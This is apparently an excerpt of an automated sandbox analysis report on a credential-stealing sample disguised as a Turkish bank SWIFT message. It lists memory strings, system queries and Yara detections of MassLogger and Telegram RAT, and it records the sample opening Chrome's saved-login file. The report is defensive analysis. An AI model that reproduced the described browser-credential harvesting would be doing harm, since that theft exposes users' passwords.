                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLB
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlp
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlk
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\x*
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4'#
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLt
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTh(
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp$
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL}
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL|
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,H
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLe
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLf
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHP%
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,D
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,A
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,M
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<8"
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q b*
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,I
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLj
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,J
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh1
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt*(
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh-
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxt+
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$x
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$t
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh#
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh+
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qD,,
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh,
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@$*
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$c
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh%
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|;'
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhS
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qH4
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhQ
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhR
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhO
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp#$
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qH:
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhW
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhU
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qH5
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qH6
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhC
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhD
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$}
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$P
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$y
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$z
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qH,
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX1%
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh{
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhy
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtj)
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhz
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlZ'
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhx
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHX
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(8
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0C*
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhu
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHD
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`B$
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(+
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q()
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q('
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHH
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHE
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(%
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(&
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(Q
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(R
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(O
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHo
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(M
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(N
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]ql
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0#)
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(A
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(?
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh}
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(=
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh~
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qH^
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(>
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(L
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(I
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHj
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qk*
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4M
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qHf
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd-
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd.
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\/"
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@Y*
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd6
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd3
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd1
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd2
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q [
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpX$
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q W
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q U
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@v
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q V
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd(
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd%
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qD &
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd"
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdN
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdW
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdX
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdV
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qD6
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdQ
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qD1
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q {
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q |
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4!-
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q }
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$0
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDK
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$+
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected MassLogger RAT
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Ziraat Bankasi Swift Mesaji.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 6516, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 768, type: MEMORYSTR
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Ziraat Bankasi Swift Mesaji.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4528266173.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 6516, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 768, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
